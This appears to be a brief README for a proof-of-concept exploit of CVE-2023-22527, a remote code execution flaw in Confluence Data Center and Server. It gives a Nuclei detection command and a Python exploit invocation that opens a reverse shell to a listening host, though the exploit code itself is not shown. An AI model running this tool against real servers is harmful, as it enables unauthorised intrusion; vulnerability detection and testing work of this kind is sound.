
PoC exploit for CVE-2023-22527, a remote code execution vulnerability in Confluence Data Center and Server. Includes detection via Nuclei template and Python-based exploitation with reverse shell payload.
nuclei -v -t /path/to/template.yam; -u http://ip:port/

python3 CVE-2023-22527.py -u ip:port -lh listen-host -lp listen-port
